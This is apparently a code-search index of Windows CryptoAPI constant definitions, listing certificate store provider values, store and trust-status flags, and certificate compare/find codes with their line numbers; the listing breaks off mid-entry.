CRYPT_ACQUIRE_CACHE_FLAG (line 334) | CRYPT_ACQUIRE_CACHE_FLAG = 0x00000001 constant CRYPT_ACQUIRE_USE_PROV_INFO_FLAG (line 335) | CRYPT_ACQUIRE_USE_PROV_INFO_FLAG = 0x00000002 constant CRYPT_ACQUIRE_COMPARE_KEY_FLAG (line 336) | CRYPT_ACQUIRE_COMPARE_KEY_FLAG = 0x00000004 constant CRYPT_ACQUIRE_NO_HEALING (line 337) | CRYPT_ACQUIRE_NO_HEALING = 0x00000008 constant CRYPT_ACQUIRE_SILENT_FLAG (line 338) | CRYPT_ACQUIRE_SILENT_FLAG = 0x00000040 constant CRYPT_ACQUIRE_WINDOW_HANDLE_FLAG (line 339) | CRYPT_ACQUIRE_WINDOW_HANDLE_FLAG = 0x00000080 constant CRYPT_ACQUIRE_NCRYPT_KEY_FLAGS_MASK (line 340) | CRYPT_ACQUIRE_NCRYPT_KEY_FLAGS_MASK = 0x00070000 constant CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG (line 341) | CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG = 0x00010000 constant CRYPT_ACQUIRE_PREFER_NCRYPT_KEY_FLAG (line 342) | CRYPT_ACQUIRE_PREFER_NCRYPT_KEY_FLAG = 0x00020000 constant CRYPT_ACQUIRE_ONLY_NCRYPT_KEY_FLAG (line 343) | CRYPT_ACQUIRE_ONLY_NCRYPT_KEY_FLAG = 0x00040000 constant AT_KEYEXCHANGE (line 346) | AT_KEYEXCHANGE = 1 constant AT_SIGNATURE (line 347) | AT_SIGNATURE = 2 constant CERT_NCRYPT_KEY_SPEC (line 348) | CERT_NCRYPT_KEY_SPEC = 0xFFFFFFFF constant USAGE_MATCH_TYPE_AND (line 351) | USAGE_MATCH_TYPE_AND = 0 constant USAGE_MATCH_TYPE_OR (line 352) | USAGE_MATCH_TYPE_OR = 1 constant X509_ASN_ENCODING (line 355) | X509_ASN_ENCODING = 0x00000001 constant PKCS_7_ASN_ENCODING (line 356) | PKCS_7_ASN_ENCODING = 0x00010000 constant CERT_STORE_PROV_MSG (line 359) | CERT_STORE_PROV_MSG = 1 constant CERT_STORE_PROV_MEMORY (line 360) | CERT_STORE_PROV_MEMORY = 2 constant CERT_STORE_PROV_FILE (line 361) | CERT_STORE_PROV_FILE = 3 constant CERT_STORE_PROV_REG (line 362) | CERT_STORE_PROV_REG = 4 constant CERT_STORE_PROV_PKCS7 (line 363) | CERT_STORE_PROV_PKCS7 = 5 constant CERT_STORE_PROV_SERIALIZED (line 364) | CERT_STORE_PROV_SERIALIZED = 6 constant CERT_STORE_PROV_FILENAME_A (line 365) | CERT_STORE_PROV_FILENAME_A = 7 constant CERT_STORE_PROV_FILENAME_W (line 366) | CERT_STORE_PROV_FILENAME_W = 8 constant CERT_STORE_PROV_FILENAME (line 367) | CERT_STORE_PROV_FILENAME = CERT_STORE_PROV_FILENAME_W constant CERT_STORE_PROV_SYSTEM_A (line 368) | CERT_STORE_PROV_SYSTEM_A = 9 constant CERT_STORE_PROV_SYSTEM_W (line 369) | CERT_STORE_PROV_SYSTEM_W = 10 constant CERT_STORE_PROV_SYSTEM (line 370) | CERT_STORE_PROV_SYSTEM = CERT_STORE_PROV_SYSTEM_W constant CERT_STORE_PROV_COLLECTION (line 371) | CERT_STORE_PROV_COLLECTION = 11 constant CERT_STORE_PROV_SYSTEM_REGISTRY_A (line 372) | CERT_STORE_PROV_SYSTEM_REGISTRY_A = 12 constant CERT_STORE_PROV_SYSTEM_REGISTRY_W (line 373) | CERT_STORE_PROV_SYSTEM_REGISTRY_W = 13 constant CERT_STORE_PROV_SYSTEM_REGISTRY (line 374) | CERT_STORE_PROV_SYSTEM_REGISTRY = CERT_STORE_PROV_SYSTEM_REGISTRY_W constant CERT_STORE_PROV_PHYSICAL_W (line 375) | CERT_STORE_PROV_PHYSICAL_W = 14 constant CERT_STORE_PROV_PHYSICAL (line 376) | CERT_STORE_PROV_PHYSICAL = CERT_STORE_PROV_PHYSICAL_W constant CERT_STORE_PROV_SMART_CARD_W (line 377) | CERT_STORE_PROV_SMART_CARD_W = 15 constant CERT_STORE_PROV_SMART_CARD (line 378) | CERT_STORE_PROV_SMART_CARD = CERT_STORE_PROV_SMART_CARD_W constant CERT_STORE_PROV_LDAP_W (line 379) | CERT_STORE_PROV_LDAP_W = 16 constant CERT_STORE_PROV_LDAP (line 380) | CERT_STORE_PROV_LDAP = CERT_STORE_PROV_LDAP_W constant CERT_STORE_PROV_PKCS12 (line 381) | CERT_STORE_PROV_PKCS12 = 17 constant CERT_STORE_NO_CRYPT_RELEASE_FLAG (line 384) | CERT_STORE_NO_CRYPT_RELEASE_FLAG = 0x00000001 constant CERT_STORE_SET_LOCALIZED_NAME_FLAG (line 385) | CERT_STORE_SET_LOCALIZED_NAME_FLAG = 0x00000002 constant CERT_STORE_DEFER_CLOSE_UNTIL_LAST_FREE_FLAG (line 386) | CERT_STORE_DEFER_CLOSE_UNTIL_LAST_FREE_FLAG = 0x00000004 constant CERT_STORE_DELETE_FLAG (line 387) | CERT_STORE_DELETE_FLAG = 0x00000010 constant CERT_STORE_UNSAFE_PHYSICAL_FLAG (line 388) | CERT_STORE_UNSAFE_PHYSICAL_FLAG = 0x00000020 constant CERT_STORE_SHARE_STORE_FLAG (line 389) | CERT_STORE_SHARE_STORE_FLAG = 0x00000040 constant CERT_STORE_SHARE_CONTEXT_FLAG (line 390) | CERT_STORE_SHARE_CONTEXT_FLAG = 0x00000080 constant CERT_STORE_MANIFOLD_FLAG (line 391) | CERT_STORE_MANIFOLD_FLAG = 0x00000100 constant CERT_STORE_ENUM_ARCHIVED_FLAG (line 392) | CERT_STORE_ENUM_ARCHIVED_FLAG = 0x00000200 constant CERT_STORE_UPDATE_KEYID_FLAG (line 393) | CERT_STORE_UPDATE_KEYID_FLAG = 0x00000400 constant CERT_STORE_BACKUP_RESTORE_FLAG (line 394) | CERT_STORE_BACKUP_RESTORE_FLAG = 0x00000800 constant CERT_STORE_MAXIMUM_ALLOWED_FLAG (line 395) | CERT_STORE_MAXIMUM_ALLOWED_FLAG = 0x00001000 constant CERT_STORE_CREATE_NEW_FLAG (line 396) | CERT_STORE_CREATE_NEW_FLAG = 0x00002000 constant CERT_STORE_OPEN_EXISTING_FLAG (line 397) | CERT_STORE_OPEN_EXISTING_FLAG = 0x00004000 constant CERT_STORE_READONLY_FLAG (line 398) | CERT_STORE_READONLY_FLAG = 0x00008000 constant CERT_SYSTEM_STORE_CURRENT_USER (line 401) | CERT_SYSTEM_STORE_CURRENT_USER = 0x00010000 constant CERT_SYSTEM_STORE_LOCAL_MACHINE (line 402) | CERT_SYSTEM_STORE_LOCAL_MACHINE = 0x00020000 constant CERT_SYSTEM_STORE_CURRENT_SERVICE (line 403) | CERT_SYSTEM_STORE_CURRENT_SERVICE = 0x00040000 constant CERT_SYSTEM_STORE_SERVICES (line 404) | CERT_SYSTEM_STORE_SERVICES = 0x00050000 constant CERT_SYSTEM_STORE_USERS (line 405) | CERT_SYSTEM_STORE_USERS = 0x00060000 constant CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY (line 406) | CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY = 0x00070000 constant CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY (line 407) | CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY = 0x00080000 constant CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE (line 408) | CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE = 0x00090000 constant CERT_SYSTEM_STORE_UNPROTECTED_FLAG (line 409) | CERT_SYSTEM_STORE_UNPROTECTED_FLAG = 0x40000000 constant CERT_SYSTEM_STORE_RELOCATE_FLAG (line 410) | CERT_SYSTEM_STORE_RELOCATE_FLAG = 0x80000000 constant CERT_REGISTRY_STORE_REMOTE_FLAG (line 413) | CERT_REGISTRY_STORE_REMOTE_FLAG = 0x00010000 constant CERT_REGISTRY_STORE_SERIALIZED_FLAG (line 414) | CERT_REGISTRY_STORE_SERIALIZED_FLAG = 0x00020000 constant CERT_REGISTRY_STORE_ROAMING_FLAG (line 415) | CERT_REGISTRY_STORE_ROAMING_FLAG = 0x00040000 constant CERT_REGISTRY_STORE_MY_IE_DIRTY_FLAG (line 416) | CERT_REGISTRY_STORE_MY_IE_DIRTY_FLAG = 0x00080000 constant CERT_REGISTRY_STORE_LM_GPT_FLAG (line 417) | CERT_REGISTRY_STORE_LM_GPT_FLAG = 0x01000000 constant CERT_REGISTRY_STORE_CLIENT_GPT_FLAG (line 418) | CERT_REGISTRY_STORE_CLIENT_GPT_FLAG = 0x80000000 constant CERT_FILE_STORE_COMMIT_ENABLE_FLAG (line 419) | CERT_FILE_STORE_COMMIT_ENABLE_FLAG = 0x00010000 constant CERT_LDAP_STORE_SIGN_FLAG (line 420) | CERT_LDAP_STORE_SIGN_FLAG = 0x00010000 constant CERT_LDAP_STORE_AREC_EXCLUSIVE_FLAG (line 421) | CERT_LDAP_STORE_AREC_EXCLUSIVE_FLAG = 0x00020000 constant CERT_LDAP_STORE_OPENED_FLAG (line 422) | CERT_LDAP_STORE_OPENED_FLAG = 0x00040000 constant CERT_LDAP_STORE_UNBIND_FLAG (line 423) | CERT_LDAP_STORE_UNBIND_FLAG = 0x00080000 constant CERT_STORE_ADD_NEW (line 426) | CERT_STORE_ADD_NEW = 1 constant CERT_STORE_ADD_USE_EXISTING (line 427) | CERT_STORE_ADD_USE_EXISTING = 2 constant CERT_STORE_ADD_REPLACE_EXISTING (line 428) | CERT_STORE_ADD_REPLACE_EXISTING = 3 constant CERT_STORE_ADD_ALWAYS (line 429) | CERT_STORE_ADD_ALWAYS = 4 constant CERT_STORE_ADD_REPLACE_EXISTING_INHERIT_PROPERTIES (line 430) | CERT_STORE_ADD_REPLACE_EXISTING_INHERIT_PROPERTIES = 5 constant CERT_STORE_ADD_NEWER (line 431) | CERT_STORE_ADD_NEWER = 6 constant CERT_STORE_ADD_NEWER_INHERIT_PROPERTIES (line 432) | CERT_STORE_ADD_NEWER_INHERIT_PROPERTIES = 7 constant CERT_TRUST_NO_ERROR (line 435) | CERT_TRUST_NO_ERROR = 0x00000000 constant CERT_TRUST_IS_NOT_TIME_VALID (line 436) | CERT_TRUST_IS_NOT_TIME_VALID = 0x00000001 constant CERT_TRUST_IS_REVOKED (line 437) | CERT_TRUST_IS_REVOKED = 0x00000004 constant CERT_TRUST_IS_NOT_SIGNATURE_VALID (line 438) | CERT_TRUST_IS_NOT_SIGNATURE_VALID = 0x00000008 constant CERT_TRUST_IS_NOT_VALID_FOR_USAGE (line 439) | CERT_TRUST_IS_NOT_VALID_FOR_USAGE = 0x00000010 constant CERT_TRUST_IS_UNTRUSTED_ROOT (line 440) | CERT_TRUST_IS_UNTRUSTED_ROOT = 0x00000020 constant CERT_TRUST_REVOCATION_STATUS_UNKNOWN (line 441) | CERT_TRUST_REVOCATION_STATUS_UNKNOWN = 0x00000040 constant CERT_TRUST_IS_CYCLIC (line 442) | CERT_TRUST_IS_CYCLIC = 0x00000080 constant CERT_TRUST_INVALID_EXTENSION (line 443) | CERT_TRUST_INVALID_EXTENSION = 0x00000100 constant CERT_TRUST_INVALID_POLICY_CONSTRAINTS (line 444) | CERT_TRUST_INVALID_POLICY_CONSTRAINTS = 0x00000200 constant CERT_TRUST_INVALID_BASIC_CONSTRAINTS (line 445) | CERT_TRUST_INVALID_BASIC_CONSTRAINTS = 0x00000400 constant CERT_TRUST_INVALID_NAME_CONSTRAINTS (line 446) | CERT_TRUST_INVALID_NAME_CONSTRAINTS = 0x00000800 constant CERT_TRUST_HAS_NOT_SUPPORTED_NAME_CONSTRAINT (line 447) | CERT_TRUST_HAS_NOT_SUPPORTED_NAME_CONSTRAINT = 0x00001000 constant CERT_TRUST_HAS_NOT_DEFINED_NAME_CONSTRAINT (line 448) | CERT_TRUST_HAS_NOT_DEFINED_NAME_CONSTRAINT = 0x00002000 constant CERT_TRUST_HAS_NOT_PERMITTED_NAME_CONSTRAINT (line 449) | CERT_TRUST_HAS_NOT_PERMITTED_NAME_CONSTRAINT = 0x00004000 constant CERT_TRUST_HAS_EXCLUDED_NAME_CONSTRAINT (line 450) | CERT_TRUST_HAS_EXCLUDED_NAME_CONSTRAINT = 0x00008000 constant CERT_TRUST_IS_PARTIAL_CHAIN (line 451) | CERT_TRUST_IS_PARTIAL_CHAIN = 0x00010000 constant CERT_TRUST_CTL_IS_NOT_TIME_VALID (line 452) | CERT_TRUST_CTL_IS_NOT_TIME_VALID = 0x00020000 constant CERT_TRUST_CTL_IS_NOT_SIGNATURE_VALID (line 453) | CERT_TRUST_CTL_IS_NOT_SIGNATURE_VALID = 0x00040000 constant CERT_TRUST_CTL_IS_NOT_VALID_FOR_USAGE (line 454) | CERT_TRUST_CTL_IS_NOT_VALID_FOR_USAGE = 0x00080000 constant CERT_TRUST_HAS_WEAK_SIGNATURE (line 455) | CERT_TRUST_HAS_WEAK_SIGNATURE = 0x00100000 constant CERT_TRUST_IS_OFFLINE_REVOCATION (line 456) | CERT_TRUST_IS_OFFLINE_REVOCATION = 0x01000000 constant CERT_TRUST_NO_ISSUANCE_CHAIN_POLICY (line 457) | CERT_TRUST_NO_ISSUANCE_CHAIN_POLICY = 0x02000000 constant CERT_TRUST_IS_EXPLICIT_DISTRUST (line 458) | CERT_TRUST_IS_EXPLICIT_DISTRUST = 0x04000000 constant CERT_TRUST_HAS_NOT_SUPPORTED_CRITICAL_EXT (line 459) | CERT_TRUST_HAS_NOT_SUPPORTED_CRITICAL_EXT = 0x08000000 constant CERT_TRUST_HAS_EXACT_MATCH_ISSUER (line 462) | CERT_TRUST_HAS_EXACT_MATCH_ISSUER = 0x00000001 constant CERT_TRUST_HAS_KEY_MATCH_ISSUER (line 463) | CERT_TRUST_HAS_KEY_MATCH_ISSUER = 0x00000002 constant CERT_TRUST_HAS_NAME_MATCH_ISSUER (line 464) | CERT_TRUST_HAS_NAME_MATCH_ISSUER = 0x00000004 constant CERT_TRUST_IS_SELF_SIGNED (line 465) | CERT_TRUST_IS_SELF_SIGNED = 0x00000008 constant CERT_TRUST_HAS_PREFERRED_ISSUER (line 466) | CERT_TRUST_HAS_PREFERRED_ISSUER = 0x00000100 constant CERT_TRUST_HAS_ISSUANCE_CHAIN_POLICY (line 467) | CERT_TRUST_HAS_ISSUANCE_CHAIN_POLICY = 0x00000400 constant CERT_TRUST_HAS_VALID_NAME_CONSTRAINTS (line 468) | CERT_TRUST_HAS_VALID_NAME_CONSTRAINTS = 0x00000400 constant CERT_TRUST_IS_PEER_TRUSTED (line 469) | CERT_TRUST_IS_PEER_TRUSTED = 0x00000800 constant CERT_TRUST_HAS_CRL_VALIDITY_EXTENDED (line 470) | CERT_TRUST_HAS_CRL_VALIDITY_EXTENDED = 0x00001000 constant CERT_TRUST_IS_FROM_EXCLUSIVE_TRUST_STORE (line 471) | CERT_TRUST_IS_FROM_EXCLUSIVE_TRUST_STORE = 0x00002000 constant CERT_TRUST_IS_CA_TRUSTED (line 472) | CERT_TRUST_IS_CA_TRUSTED = 0x00004000 constant CERT_TRUST_IS_COMPLEX_CHAIN (line 473) | CERT_TRUST_IS_COMPLEX_CHAIN = 0x00010000 constant CERT_INFO_VERSION_FLAG (line 476) | CERT_INFO_VERSION_FLAG = 1 constant CERT_INFO_SERIAL_NUMBER_FLAG (line 477) | CERT_INFO_SERIAL_NUMBER_FLAG = 2 constant CERT_INFO_SIGNATURE_ALGORITHM_FLAG (line 478) | CERT_INFO_SIGNATURE_ALGORITHM_FLAG = 3 constant CERT_INFO_ISSUER_FLAG (line 479) | CERT_INFO_ISSUER_FLAG = 4 constant CERT_INFO_NOT_BEFORE_FLAG (line 480) | CERT_INFO_NOT_BEFORE_FLAG = 5 constant CERT_INFO_NOT_AFTER_FLAG (line 481) | CERT_INFO_NOT_AFTER_FLAG = 6 constant CERT_INFO_SUBJECT_FLAG (line 482) | CERT_INFO_SUBJECT_FLAG = 7 constant CERT_INFO_SUBJECT_PUBLIC_KEY_INFO_FLAG (line 483) | CERT_INFO_SUBJECT_PUBLIC_KEY_INFO_FLAG = 8 constant CERT_INFO_ISSUER_UNIQUE_ID_FLAG (line 484) | CERT_INFO_ISSUER_UNIQUE_ID_FLAG = 9 constant CERT_INFO_SUBJECT_UNIQUE_ID_FLAG (line 485) | CERT_INFO_SUBJECT_UNIQUE_ID_FLAG = 10 constant CERT_INFO_EXTENSION_FLAG (line 486) | CERT_INFO_EXTENSION_FLAG = 11 constant CERT_COMPARE_MASK (line 489) | CERT_COMPARE_MASK = 0xFFFF constant CERT_COMPARE_SHIFT (line 490) | CERT_COMPARE_SHIFT = 16 constant CERT_COMPARE_ANY (line 491) | CERT_COMPARE_ANY = 0 constant CERT_COMPARE_SHA1_HASH (line 492) | CERT_COMPARE_SHA1_HASH = 1 constant CERT_COMPARE_NAME (line 493) | CERT_COMPARE_NAME = 2 constant CERT_COMPARE_ATTR (line 494) | CERT_COMPARE_ATTR = 3 constant CERT_COMPARE_MD5_HASH (line 495) | CERT_COMPARE_MD5_HASH = 4 constant CERT_COMPARE_PROPERTY (line 496) | CERT_COMPARE_PROPERTY = 5 constant CERT_COMPARE_PUBLIC_KEY (line 497) | CERT_COMPARE_PUBLIC_KEY = 6 constant CERT_COMPARE_HASH (line 498) | CERT_COMPARE_HASH = CERT_COMPARE_SHA1_HASH constant CERT_COMPARE_NAME_STR_A (line 499) | CERT_COMPARE_NAME_STR_A = 7 constant CERT_COMPARE_NAME_STR_W (line 500) | CERT_COMPARE_NAME_STR_W = 8 constant CERT_COMPARE_KEY_SPEC (line 501) | CERT_COMPARE_KEY_SPEC = 9 constant CERT_COMPARE_ENHKEY_USAGE (line 502) | CERT_COMPARE_ENHKEY_USAGE = 10 constant CERT_COMPARE_CTL_USAGE (line 503) | CERT_COMPARE_CTL_USAGE = CERT_COMPARE_ENHKEY_USAGE constant CERT_COMPARE_SUBJECT_CERT (line 504) | CERT_COMPARE_SUBJECT_CERT = 11 constant CERT_COMPARE_ISSUER_OF (line 505) | CERT_COMPARE_ISSUER_OF = 12 constant CERT_COMPARE_EXISTING (line 506) | CERT_COMPARE_EXISTING = 13 constant CERT_COMPARE_SIGNATURE_HASH (line 507) | CERT_COMPARE_SIGNATURE_HASH = 14 constant CERT_COMPARE_KEY_IDENTIFIER (line 508) | CERT_COMPARE_KEY_IDENTIFIER = 15 constant CERT_COMPARE_CERT_ID (line 509) | CERT_COMPARE_CERT_ID = 16 constant CERT_COMPARE_CROSS_CERT_DIST_POINTS (line 510) | CERT_COMPARE_CROSS_CERT_DIST_POINTS = 17 constant CERT_COMPARE_PUBKEY_MD5_HASH (line 511) | CERT_COMPARE_PUBKEY_MD5_HASH = 18 constant CERT_COMPARE_SUBJECT_INFO_ACCESS (line 512) | CERT_COMPARE_SUBJECT_INFO_ACCESS = 19 constant CERT_COMPARE_HASH_STR (line 513) | CERT_COMPARE_HASH_STR = 20 constant CERT_COMPARE_HAS_PRIVATE_KEY (line 514) | CERT_COMPARE_HAS_PRIVATE_KEY = 21 constant CERT_FIND_ANY (line 515) | CERT_FIND_ANY = (CERT_COMPARE_ANY << CERT_COMPAR... constant CERT_FIND_SHA1_HASH (line 516) | CERT_FIND_SHA1_HASH = (CERT_COMPARE_SHA1_HASH << CERT_... constant CERT_FIND_MD5_HASH (line 517) | CERT_FIND_MD5_HASH = (CERT_COMPARE_MD5_HASH << CERT_C... constant CERT_FIND_SIGNATURE_HASH (line 518) | CERT_FIND_SIGNATURE_HASH = (CERT_COMPARE_SIGNATURE_HASH << ... constant CERT_FIND_KEY_IDENTIFIER (line 519) | CERT_FIND_KEY_IDENTIFIER = (CERT_COMPARE_KEY_IDENTIFIER << ... constant CERT_FIND_HASH (line 520) | CERT_FIND_HASH = CERT_FIND_SHA1_HASH constant CERT_FIND_PROPERTY (line 521) | CERT_FIND_PROPERTY = (CERT_COMPARE_PROPERTY << CERT_C... constant CERT_FIND_PUBLIC_KEY (line 522) | CERT_FIND_PUBLIC_KEY = (CERT_COMPARE_PUBLIC_KEY << CERT... constant CERT_FIND_SUBJECT_NAME (line 523) | CERT_FIND_SUBJECT_NAME = (CERT_COMPARE_NAME<